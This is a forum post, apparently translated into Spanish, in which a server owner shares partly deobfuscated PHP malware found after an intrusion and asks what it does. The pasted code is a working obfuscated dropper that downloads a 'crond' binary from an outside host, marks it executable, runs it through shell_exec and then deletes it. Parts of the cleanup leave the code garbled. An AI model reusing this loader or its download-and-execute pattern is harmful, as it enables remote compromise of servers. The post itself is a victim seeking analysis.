Mi servidor fue atacado (eliminé la infección, por lo que sé) y quiero saber qué es lo que, en todo caso, podría estar comprometido (como mis datos de usuario, por ejemplo).
Publiqué mi última pregunta en Stack Overflow. Bueno, noté que varios servidores de virus seguían intentando contactar con mi máquina y me estaban dando un código malicioso.
Traduje esto desde base64, pero aún es en su mayor parte incomprensible. He determinado que está intentando ir a una página llamada ADVERTENCIA ENLACE MALICIOSO: (editado)
Aquí está el código, lo he limpiado sustancialmente:
$w50="0o,]a*Lt7/D%[>|WAvITmqpwH~.B5kN1O\r'<( M\tV?^_3F\neb\'+iUXS\9xZ4hzr};P{gs=&yJQ)dj-fE\"2!Rlc@C#nGY:Ku8"; $GLOBALS['fwjlt66'] = $w50[22].$w50[62].$w50[22].$w50[43].$w50[96].$w50[91].$w50[4].$w50[20].$w50[47]; $GLOBALS['qjgox86'] = $w50[80].$w50[96].$w50[91].$w50[87].$w50[7].$w50[53].$w50[1].$w50[91].$w50[43].$w50[47].$w50[59].$w50[53].$w50[70].$w50[7].$w50[70]; $GLOBALS['agnsv93'] = $w50[70].$w50[7].$w50[64].$w50[86].$w50[47].$w50[91]; $GLOBALS['cqvwl52'] = $w50[77].$w50[47].$w50[87].$w50[48].$w50[53].$w50[91]; $GLOBALS['ecgfc33'] = $w50[80].$w50[53].$w50[86].$w50[47].$w50[43].$w50[47].$w50[59].$w50[53].$w50[70].$w50[7].$w50[70]; $GLOBALS['licvl99'] = $w50[59].$w50[62].$w50[29].$w50[73].$w50[69].$w50[58].$w50[50]; $GLOBALS['bokew22'] = $w50[87].$w50[62].$w50[20].$w50[1].$w50[77]; $GLOBALS['wtaky62'] = $w50[70].$w50[62].$w50[47].$w50[86].$w50[86].$w50[43].$w50[47].$w50[59].$w50[47].$w50[87]; $GLOBALS['neabn53'] = $w50[70].$w50[86].$w50[47].$w50[47].$w50[22]; $GLOBALS['cfffy63'] = $w50[96].$w50[91].$w50[86].$w50[53].$w50[91].$w50[29]; $GLOBALS['quyxh40'] = $w50[1].$w50[73].$w50[1].$w50[86].$w50[53].$w50[44].$w50[50]; $GLOBALS['ebiwk51'] = $w50[80].$w50[1].$w50[22].$w50[47].$w50[91]; $GLOBALS['exwal59'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[53].$w50[91].$w50[53].$w50[7]; $GLOBALS['wyvgi49'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[70].$w50[47].$w50[7].$w50[1].$w50[22].$w50[7]; $GLOBALS['ayrhy29'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[47].$w50[59].$w50[47].$w50[87]; $GLOBALS['wkobm38'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[87].$w50[86].$w50[1].$w50[70].$w50[47]; $GLOBALS['jxivj52'] = $w50[80].$w50[47].$w50[1].$w50[80]; $GLOBALS['wnmlt16'] = $w50[80].$w50[64].$w50[47].$w50[4].$w50[77]; $GLOBALS['yaqtf48'] = $w50[80].$w50[87].$w50[86].$w50[1].$w50[70].$w50[47]; $GLOBALS['nqtio88'] = $w50[87].$w50[59].$w50[7].$w50[77].$w50[22].$w50[44].$w50[61]; $GLOBALS['rxtpe19'] = $w50[80].$w50[53].$w50[86].$w50[47].$w50[43].$w50[22].$w50[96].$w50[7].$w50[43].$w50[87].$w50[1].$w50[91].$w50[7].$w50[47].$w50[91].$w50[7].$w50[70]; $GLOBALS['mrwmq50'] = $w50[80].$w50[23].$w50[64].$w50[53].$w50[7].$w50[47]; $ktjhg56 =$w50[62].$w50[7].$w50[7].$w50[22].$w50[94].$w50[9].$w50[9].$w50[22].$w50[4].$w50[69].$w50[47].$w50[70].$w50[26].$w50[7].$w50[1].$w50[96].$w50[87].$w50[62].$w50[22].$w50[4].$w50[77].$w50[63].$w50[26].$w50[87].$w50[1].$w50[20].$w50[9].$w50[87].$w50[64].$w50[1].$w50[91].$w50[77].$w50[44].$w50[83];
$kilow69 = "http://pages.touchpadz.com/crond64";
$xsqmk27 = "XDVSN_SESSION_COOKIE=PnJxPDMyPi1ycTw+d3BqPD4td3BqPD53cHI8Pi13cHI8Pm52PDcyMj4tbnY8Pm5hPDMyMj4tbmE8PmBxPDAyPi1gcTw+bnc8anZ2cjgtLXFpLHZtd2FqcmNmeCxhbW8tPi1udzw+YHc8anZ2cjgtLWBjdix2bXdhanJjZngsYW1vLWNjMCxyanI+LWB3PD5xdzxqdnZyOC0tcXZjdix2bXdhanJjZngsYW1vLWVoMzEscmpyPi1xdzw+bmZgPHVgXTIyMz4tbmZgPD5paTw0YDUwMDZhNDMwYWQyY2AuNmY0YWZnMmMwNDQ3YWBnMC40NzBhYDVhNzdjZjc3YTJmLjRmOmdhO2A1MTs3Zjo1MTouMGA3OmFhO2M3MGcyZ2M3NS4wYTE7NDNnOzRgNmA0MjcxLjAzYzM0M2YxNGMzZmA0OmMuNjZgYDs0Mzs1NTVgYzoxNy43NTQyY2c6MzJhNDMyNztnLjE3YDozMjMzNjUwNTA7NmMuN2EyOjNkNGMzOzY0ZjsyMi41YzcyZmY7YTcxMjdjZjA0LjM7Y2AyNDI3MGAzOjozMzEuNzdhMDdnMDc2YGAxMWFhNy40NjdgMzNkYTM0ZGMwYToxLjA6Mjs7ZzY2OmQ1OmNjYy41MWAzMjdkOjRjZGQ3O2E2LjAwN2dhYDQxNWY1YDAxZmAuM2Q0ZDoyZmQ3MzU0MjAxZy4zYzpmO2RnMjY1ZGA1YzQ2LjZkMDJjM2FmNDU3ZDIxZDQuZ2RmOjAwNzA3NGA7NjU7LjE7ZzJnOmE0N2FmMDVnNWQuNWQ0ZDE3M2M3ZzI1YTJkOi42ZDJnNmBjOjExOjs0YWFjLjE2NztmZmA2ZDVnZjoxMi4zMmMxYzNgYTQ0YWQ6NWYwLjYwZmc0MDdkMzQyYWNnZ2AuM2NgMjMxNjAzZmEyYzM0Ni43M2MxZGYwNjQ3NjJgMDIzLjVjNDRmNzFgNTcxOzs2Z2MuMzU0MjJhNGEwMGFkZjYzNS41YzRmOjc6MzBhNzo3Ojs6LjdhMDJgYDphNDpkOzc3MWMuNjs2Y2FjNzE2ZjA7NTQ0MC43ZjNgOjcwNTE7YTExNmY6LjFnYTBgMjBnN2RgYWRmZjouNTJgZmcwYzo2MDRgZGQzMy42MjE1MzphZzQzMWZmZ2Q1LjA2ZDs7ZmM1NWRmZjsxOmYuMGEyMDszMTQ3YTpgYTo1MC43ZjM3MDc1YDM1NzIzZGMzLmY2YWYyYzAwZzM3OjYwNC40OzUxNjMxMTJmYTMyNGEuMWRgYzVmMDs0YTRkNTMzNi46NDs3MzcyMWM3O2MzMDQuNzA0MTA3N2Y0YDBjNDo7MC4wZjE1YTNmYDA1Ozo0O2A2LjU2MWRnNDMyMmQzZjVjNS43Ojc3NTMxNTczNWc2ZmQuNTFgMTRjMGYyOjIyMGY3Oy42MWMzNTFhZDNhYGM1ZDdkLjM6MjI6NDdgNmM1NzJnNzAuNmNkZDszNzY3MjtnOjtnOy43OjUyOmNkZzY2YDc7OmA2LjRnMWFgNDZkNzFnNzU0YDsuNWZmN2Y6N2E0MDUyMjAxNi4wNWMzMzoyZDYzMTBmNGEwLjUyYDNgZmM2MDczO2Y3NGQuNjEyYGBkMzQxOjBnYzM0MS41ZjQ3YTsyYDA3NTA1MTA2LjVhZzc7Nzc0NjZjZGEwYWQuNGQzZDI6Zzs3ZzowNTFjMS42NDU0NjY1NjVnOjo6MzU3LjExZ2BjY2ZkMTczZDUwYTI+LWlpPA==";
$GLOBALS = array([dusbyosox] => fl [pvdmmvljuf] => incfl [ujhcrcgt] => id [smhtcwn] => qstr [jumxqwr] => ids [hnbbbkqfrkpt] => scode [culgtk] => url [krkdpxshxvn] => ch [hjmyjb] => errno [cupqhvfqdl] => msg [wlhdpqq] => errstr [loxnlmgvdc] => err [w50] => 0o,]a*Lt7/D%[>|WAvITmqpwH~.B5kN1O '<( M V?^_3F eb$6'+iUXSxZ4hzr};P{gs=&yJQ)dj-fE"2!Rlc@C#nGY:Ku8 [fwjlt66] => php_uname [qjgox86] => function_exists [agnsv93] => strlen [cqvwl52] => decbin [ecgfc33] => file_exists [licvl99] => xhkyg96 [bokew22] => chmod [wtaky62] => shell_exec [neabn53] => sleep [cfffy63] => unlink [quyxh40] => oyoli36 [ebiwk51] => fopen [exwal59] => curl_init [wyvgi49] => curl_setopt [ayrhy29] => curl_exec [wkobm38] => curl_close [jxivj52] => feof [wnmlt16] => fread [yaqtf48] => fclose [nqtio88] => cxtdp34 [rxtpe19] => file_put_contents [mrwmq50] => fwrite [ktjhg56] => http://pages.touchpadz.com/crond32 [kilow69] => http://pages.touchpadz.com/crond64 [xsqmk27] => XDVSN_SESSION_COOKIE=PnJxPDMyPi1ycTw+d3BqPD4td3BqPD53cHI8Pi13cHI8Pm52PDcyMj4tbnY8Pm5hPDMyMj4tbmE8PmBxPDAyPi1gcTw+bnc8anZ2cjgtLXFpLHZtd2FqcmNmeCxhbW8tPi1udzw+YHc8anZ2cjgtLWBjdix2bXdhanJjZngsYW1vLWNjMCxyanI+LWB3PD5xdzxqdnZyOC0tcXZjdix2bXdhanJjZngsYW1vLWVoMzEscmpyPi1xdzw+bmZgPHVgXTIyMz4tbmZgPD5paTw0YDUwMDZhNDMwYWQyY2AuNmY0YWZnMmMwNDQ3YWBnMC40NzBhYDVhNzdjZjc3YTJmLjRmOmdhO2A1MTs3Zjo1MTouMGA3OmFhO2M3MGcyZ2M3NS4wYTE7NDNnOzRgNmA0MjcxLjAzYzM0M2YxNGMzZmA0OmMuNjZgYDs0Mzs1NTVgYzoxNy43NTQyY2c6MzJhNDMyNztnLjE3YDozMjMzNjUwNTA7NmMuN2EyOjNkNGMzOzY0ZjsyMi41YzcyZmY7YTcxMjdjZjA0LjM7Y2AyNDI3MGAzOjozMzEuNzdhMDdnMDc2YGAxMWFhNy40NjdgMzNkYTM0ZGMwYToxLjA6Mjs7ZzY2OmQ1OmNjYy41MWAzMjdkOjRjZGQ3O2E2LjAwN2dhYDQxNWY1YDAxZmAuM2Q0ZDoyZmQ3MzU0MjAxZy4zYzpmO2RnMjY1ZGA1YzQ2LjZkMDJjM2FmNDU3ZDIxZDQuZ2RmOjAwNzA3NGA7NjU7LjE7ZzJnOmE0N2FmMDVnNWQuNWQ0ZDE3M2M3ZzI1YTJkOi42ZDJnNmBjOjExOjs0YWFjLjE2NztmZmA2ZDVnZjoxMi4zMmMxYzNgYTQ0YWQ6NWYwLjYwZmc0MDdkMzQyYWNnZ2AuM2NgMjMxNjAzZmEyYzM0Ni43M2MxZGYwNjQ3NjJgMDIzLjVjNDRmNzFgNTcxOzs2Z2MuMzU0MjJhNGEwMGFkZjYzNS41YzRmOjc6MzBhNzo3Ojs6LjdhMDJgYDphNDpkOzc3MWMuNjs2Y2FjNzE2ZjA7NTQ0MC43ZjNgOjcwNTE7YTExNmY6LjFnYTBgMjBnN2RgYWRmZjouNTJgZmcwYzo2MDRgZGQzMy42MjE1MzphZzQzMWZmZ2Q1LjA2ZDs7ZmM1NWRmZjsxOmYuMGEyMDszMTQ3YTpgYTo1MC43ZjM3MDc1YDM1NzIzZGMzLmY2YWYyYzAwZzM3OjYwNC40OzUxNjMxMTJmYTMyNGEuMWRgYzVmMDs0YTRkNTMzNi46NDs3MzcyMWM3O2MzMDQuNzA0MTA3N2Y0YDBjNDo7MC4wZjE1YTNmYDA1Ozo0O2A2LjU2MWRnNDMyMmQzZjVjNS43Ojc3NTMxNTczNWc2ZmQuNTFgMTRjMGYyOjIyMGY3Oy42MWMzNTFhZDNhYGM1ZDdkLjM6MjI6NDdgNmM1NzJnNzAuNmNkZDszNzY3MjtnOjtnOy43OjUyOmNkZzY2YDc7OmA2LjRnMWFgNDZkNzFnNzU0YDsuNWZmN2Y6N2E0MDUyMjAxNi4wNWMzMzoyZDYzMTBmNGEwLjUyYDNgZmM2MDczO2Y3NGQuNjEyYGBkMzQxOjBnYzM0MS41ZjQ3YTsyYDA3NTA1MTA2LjVhZzc7Nzc0NjZjZGEwYWQuNGQzZDI6Zzs3ZzowNTFjMS42NDU0NjY1NjVnOjo6MzU3LjExZ2BjY2ZkMTczZDUwYTI+LWlpPA==)
// Gives host operating system name
$aljav65 = php_uname(s);
// Gives machine type
$lyvqp40 = php_uname(m);
echo '<shchzzz>';
for (;;) {
if(!function_exists(shell_exec) {
echo '<err step=1 err=noshex data=>'
break;
}
if($aljav65 !== "Linux") {
echo '<err step=2 err=nolinux data=>';
break;
}
$eeirq58 = 'crond';
$csjxi53 = "";
// decimal to binary - probably a way to figure out the type of system it is
if(strlen(decbin(~0)) == 64) {
echo '<inf step=3 data=x64>';
$csjxi53 = $kilow69;
}
else {
echo '<inf step=3 data=x64>';
$csjxi53 = $ktjhg56;
}
$jzugq1 = "";
if(!file_exists('crond')) {
$jzugq1 = xhkyg96($w50, 'http://pages.touchpadz.com/crond64crond', crond);
if ( $jzugq1 == FALSE) {
echo '<err step=4 err=downl data=>';
break;
} else {
echo '<inf step=4 data=downok>';
}
} else {
echo '<inf step=4 data=exists>';
}
chmod($jzugq1, 755);
$caaku38 = $xsqmk27.$w50[37].$w50[26].$w50[9].$jzugq1.$w50[37].$w50[13].$w50[9].$w50[77].$w50[47].$w50[17].$w50[9].$w50[91].$w50[96].$w50[86].$w50[86].$w50[37].$w50[83].$w50[13].$w50[9].$w50[77].$w50[47].$w50[17].$w50[9].$w50[91].$w50[96].$w50[86].$w50[86].$w50[37].$w50[72];
$vepmo93 = shell_exec($caaku38);
echo $w50[35].$w50[53].$w50[91].$w50[80].$w50[37].$w50[70].$w50[7].$w50[47].$w50[22].$w50[71].$w50[28].$w50[37].$w50[77].$w50[4].$w50[7].$w50[4].$w50[71].$w50[77].$w50[1].$w50[91].$w50[47].$w50[37].$w50[77].$w50[4].$w50[7].$w50[4].$w50[83].$w50[71].$vepmo93.$w50[13];
sleep(1);
unlink($jzugq1);
break;
}
echo '</shchzzz>';
exit();
function oyoli36($w50, $iyjzg82) {
$kxsnc64 = "";
$gnmie55 = @fopen($iyjzg82, 'rb');
if ($gnmie55 == FALSE) {
if (!function_exists('curl_init')) return FALSE;
$iahsh76 = @curl_init();
@curl_setopt($iahsh76, CURLOPT_URL, $iyjzg82);
@curl_setopt($iahsh76, CURLOPT_RETURNTRANSFER, true);
$kxsnc64 = @curl_exec($iahsh76);
@curl_close($iahsh76);
} else {
while(!feof($gnmie55)) $kxsnc64.=fread($gnmie55, 1024 * 64 );
fclose($gnmie55);
}
return $kxsnc64;
}
function cxtdp34($w50, $ekfco84, $kxsnc64) {
$dlyti36 = fopen($ekfco84, wb+);
if ($dlyti36 == FALSE) {
if (!function_exists(file_put_contents) return FALSE;
if ( @file_put_contents($ekfco84, $kxsnc64) === FALSE ) return FALSE;
} else {
$gibnq51 = fwrite($dlyti36, $kxsnc64, strlen($kxsnc64));
fclose($dlyti36);
if ($gibnq51 == FALSE || $gibnq51 != strlen($kxsnc64)) return FALSE;
}
return TRUE;
}
function xhkyg96($w50, $iyjzg82, $vmtdr19) {
$kxsnc64 = oyoli36($w50, $iyjzg82);
if ($kxsnc64 == FALSE) return FALSE;
if (cxtdp34($w50, $w50[26].$w50[9].$vmtdr19, $kxsnc64) == FALSE) {
if (cxtdp34($w50, '/tmp/'.$vmtdr19, $kxsnc64) == FALSE) {
return FALSE;
} else {
return '/tmp'.$vmtdr19;
}
} else {
return "./".$vmtdr19;
}
return FALSE;
}
Esperaba que alguien supiera de algún servicio que interprete o pueda decirme lo que pudo haber ocurrido. Puedo intentar reconstruirlo yo mismo, pero si alguien tiene alguna información que podría ser muy útil para mí.